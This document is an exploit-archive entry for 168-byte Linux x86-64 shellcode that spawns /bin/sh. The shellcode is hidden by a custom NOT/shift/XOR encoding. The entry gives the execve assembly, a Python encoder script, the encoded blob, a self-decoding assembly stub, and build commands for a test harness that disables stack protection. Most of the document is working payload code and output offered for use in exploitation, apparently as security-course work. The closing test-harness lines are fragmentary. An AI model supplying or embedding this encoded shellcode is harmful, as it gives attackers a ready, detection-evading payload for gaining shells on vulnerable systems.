Linux/x86 not +shiftn+ xorn encoded /bin/sh shellcode (168 bytes) Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2019-07-29 |
Type : shellcode |
Platform : linux_x86-64
######################################## description ########################################
; Title : X64 [NOT +SHIFT-N+ XOR-N] encoded /bin/sh - shellcode
; Author : Pedro Cabral
; Twitter : @CabrallPedro
; LinkedIn :
; SLAE ID : SLAE64 - 1603
; Purpose : spawn /bin/sh shell
; Tested On : Ubuntu 16.04.6 LTS
; Arch : x64
; Size : 168 bytes
########################################## sh.asm ###########################################
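global _start
section .text

; execve("/bin//sh", argv, envp), Linux x86-64 syscall ABI (rax = nr, rdi/rsi/rdx = args).
;   argv = { "/bin//sh", NULL }   built on the stack below, rsi = &argv[0]
;   envp = { NULL }               rdx points at the NULL pushed before argv[0]
; "/bin//sh" is exactly 8 bytes (the doubled slash pads it to a full qword), so the
; 64-bit mov immediate carries no 0x00; the string's terminator is the NULL pushed first.
; NOTE(review): the published listing lacked the _start label and the final `syscall`;
; both are required (ld needs the entry symbol, and the extracted bytes below end in 0f 05).
_start:
        xor     rax, rax                    ; rax = 0; reused as the NULL pointer/terminator
        push    rax                         ; string terminator
        mov     rbx, 0x68732f2f6e69622f     ; "/bin//sh", little-endian
        push    rbx
        mov     rdi, rsp                    ; rdi = pathname
        push    rax                         ; NULL: end of argv and the only envp entry
        mov     rdx, rsp                    ; rdx = envp -> { NULL }
        push    rdi                         ; argv[0] = pathname (argv[1] is the NULL above)
        mov     rsi, rsp                    ; rsi = argv
        add     rax, 59                     ; rax = __NR_execve; encodes as 48 83 c0 3b, no 0x00 bytes
        syscall                             ; 0f 05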
#################################### original shellcode #####################################
pedro@ubuntu>nasm -felf64 sh.asm -o sh.o
pedro@ubuntu>ld -N -o sh sh.o
pedro@ubuntu>echo;objdump -d ./sh.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo
######################################## ########################################
import sys
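# Original (unencoded) execve("/bin//sh") shellcode.  A bytes literal so the script
# behaves the same under Python 2 and 3.
SHELLCODE = (b"\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53"
             b"\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05")

# Largest shift the 16-bit `dw` words consumed by decoder.asm can carry: 0xff << 8 = 0xff00.
MAX_SHIFT = 8


def encode_words(shellcode, shift, xor):
    """Encode shellcode as the list of 16-bit words decoder.asm expects.

    Layout (must stay in sync with decoder.asm):
      [0]     0x0100 | shift  -- the decoder reads only the low byte (cl) as the shift
                                 count; the 0x01 high byte just keeps a 0x00 out of the blob
      [1]     xor key
      [2..]   ((~b & 0xff) << shift) ^ xor, one word per payload byte
      [-2:]   xor, xor        -- two consecutive key words mark the end of the stream

    Raises ValueError if shift is outside 0..MAX_SHIFT (a larger shift overflows a word,
    which nasm would silently truncate) or xor is not a 16-bit value.
    """
    if not 0 <= shift <= MAX_SHIFT:
        raise ValueError("SHIFT must be between 0 and %d" % MAX_SHIFT)
    if not 0 <= xor <= 0xffff:
        raise ValueError("XOR must be a 16-bit value (0..65535)")
    words = [0x0100 | shift, xor]
    words.extend(((~b & 0xff) << shift) ^ xor for b in bytearray(shellcode))
    words.extend([xor, xor])
    return words


def format_words(words):
    """Render the word list exactly as the original script printed it.

    The first word is printed with four hex digits (`0x0104`), every other one with
    at least two (`0x539`, `0x09`), comma-separated, no trailing comma.
    """
    rendered = ["0x%04x" % words[0]] + ["0x%02x" % w for w in words[1:]]
    return ", ".join(rendered)


def encode(shellcode, shift, xor):
    """Return the `dw` operand list for decoder.asm as one string (see encode_words)."""
    return format_words(encode_words(shellcode, shift, xor))


def blob_warnings(shellcode, shift, xor):
    """Properties of the encoded blob that break it in practice.  Returns a list of messages.

    * A 0x00 byte in any emitted word: the words are stored little-endian, so both
      halves of every word end up in the injected buffer (e.g. shift 0 yields 0x0100).
    * A payload byte 0xff encodes to the key itself (~0xff = 0, 0 << n = 0, 0 ^ key = key),
      which is also the decoder's end marker.  The decoder is written to tolerate a single
      key word, but two in a row -- adjacent 0xff bytes, or a trailing 0xff directly
      followed by the terminator -- are indistinguishable from the end of the stream.
    """
    words = encode_words(shellcode, shift, xor)
    notes = []
    nulls = ["0x%04x" % w for w in words if (w & 0xff) == 0 or (w >> 8) == 0]
    if nulls:
        notes.append("encoded words contain a 0x00 byte: %s" % ", ".join(nulls))
    payload = words[2:-2]
    for i in range(len(payload)):
        if payload[i] == xor and (i + 1 == len(payload) or payload[i + 1] == xor):
            notes.append("payload byte %d (0xff) collides with the end marker; "
                         "the decoder would stop early" % i)
            break
    return notes


def main(argv):
    """CLI entry: `python <script> <SHIFT number> <XOR number>`.  Prints the blob, returns exit status."""
    if len(argv) != 3:
        sys.stderr.write("Usage : python %s <SHIFT number> <XOR number>\n" % argv[0])
        return 1
    try:
        shift, xor = int(argv[1]), int(argv[2])
        blob = encode(SHELLCODE, shift, xor)
    except ValueError as exc:
        sys.stderr.write("error: %s\n" % exc)
        return 1
    for note in blob_warnings(SHELLCODE, shift, xor):
        sys.stderr.write("warning: %s\n" % note)
    print(blob)
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))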
#################################### Encoded Shellcode #####################################
pedro@ubuntu>python 4 1337
0x0104, 0x539, 0xe49, 0x9d9, 0x6c9, 0xfc9, 0xe49, 0x179, 0x839, 0xce9, 0xc59, 0xc29, 0x839, 0x839, 0xdf9, 0xc49, 0xff9, 0xe49, 0x259, 0x4b9, 0xfc9, 0xe49, 0x259, 0x4e9, 0xfb9, 0xe49, 0x259, 0x4a9, 0xe49, 0x2f9, 0x6c9, 0x979, 0xa39, 0xa99, 0x539, 0x539
####################################### decoder.asm ########################################
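global _start
section .text

; Self-decoding stub: undoes NOT, SHL-n, XOR-key in place and jumps to the result.
;
; Encoded blob layout (16-bit little-endian words, produced by the encoder script):
;   word 0     : 0x01<shift>   only the low byte (cl) is used as the shift count;
;                              the 0x01 high byte exists to keep a 0x00 out of the blob
;   word 1     : XOR key
;   words 2..  : ((~byte & 0xff) << shift) ^ key, one word per original byte
;   last two   : key, key      two consecutive key words terminate the stream
;
; Register roles: rsi = read cursor (2 bytes/step), rdi = write cursor (1 byte/step),
; cl = shift, r9w = key, r10 = scratch, [rsp] = address of the decoded payload.
;
; Caveats a user should know:
;  * Decoding writes into `encoded`, which lives in .text, so the page must be writable:
;    `ld -N` for the standalone binary, or a writable/executable buffer when injected.
;  * A payload byte 0xff encodes to the key word itself.  A single one is recovered by
;    second_check, but two adjacent 0xff bytes, or a trailing 0xff right before the
;    terminator, look like the end marker and truncate the payload.
;  * NOTE(review): _start, decoder, main2, second_check and call_encoded were missing
;    from the published listing; their positions are reconstructed from the jumps that
;    reference them (the only placement consistent with the control flow).

_start:
        jmp     decoder                     ; data first; `[rel encoded]` keeps it position-independent

encoded : dw 0x0104, 0x539, 0xe49, 0x9d9, 0x6c9, 0xfc9, 0xe49, 0x179, 0x839, 0xce9, 0xc59, 0xc29, 0x839, 0x839, 0xdf9, 0xc49, 0xff9, 0xe49, 0x259, 0x4b9, 0xfc9, 0xe49, 0x259, 0x4e9, 0xfb9, 0xe49, 0x259, 0x4a9, 0xe49, 0x2f9, 0x6c9, 0x979, 0xa39, 0xa99, 0x539, 0x539

decoder:
        lea     rsi, [rel encoded]
        xor     rcx, rcx
        xor     r9, r9
        xor     r10, r10                    ; upper bits stay 0 so `shr r10, cl` only sees the loaded word
        mov     cx, word [rsi]              ; cl = shift count (ch = 0x01 filler, unused)
        inc     rsi
        inc     rsi
        mov     r9w, word [rsi]             ; r9w = XOR key
        inc     rsi
        inc     rsi
        push    rsi                         ; start of the payload, consumed by `call [rsp]`
        mov     rdi, rsi                    ; decode in place: rdi advances 1/byte, rsi 2/word,
                                            ; so the write cursor never overtakes the read cursor
main:
        mov     r10w, word [rsi]
        xor     r10w, r9w                   ; undo XOR; ZF set means this word equals the key
        jz      second_check                ; key word: end marker or an encoded 0xff
main2:
        shr     r10, cl                     ; undo shift
        not     r10w                        ; undo NOT; r10b is now the original byte
        mov     byte [rdi], r10b
        inc     rsi
        inc     rsi
        inc     rdi
        jmp     short main

second_check:
        ; Current word == key.  Two key words in a row end the stream; a lone one is an
        ; encoded 0xff byte (~0xff = 0, 0 << n = 0, 0 ^ key = key).
        mov     r10w, word [rsi+2]
        xor     r10w, r9w
        jz      call_encoded                ; next word is also the key -> done
        mov     r10w, word [rsi]            ; lone key word: r10w becomes 0 again and main2
        xor     r10w, r9w                   ; turns it into 0xff via shr/not
        jmp     main2

call_encoded:
        call    [rsp]                       ; run the decoded payload (address pushed in decoder)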
###################################### final shellcode ######################################
pedro@ubuntu>nasm -felf64 decoder.asm -o decoder.o
pedro@ubuntu>echo;objdump -d ./decoder.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo
pedro@ubuntu>gcc -fno-stack-protector -z execstack testShellcode.c -o testShellcode
Shellcode Length: 168
$ whoami
unsigned char code[] = \
void main(){
printf("Shellcode Length: %zu\n",strlen(code));
int (*ret)() = (int(*)())code;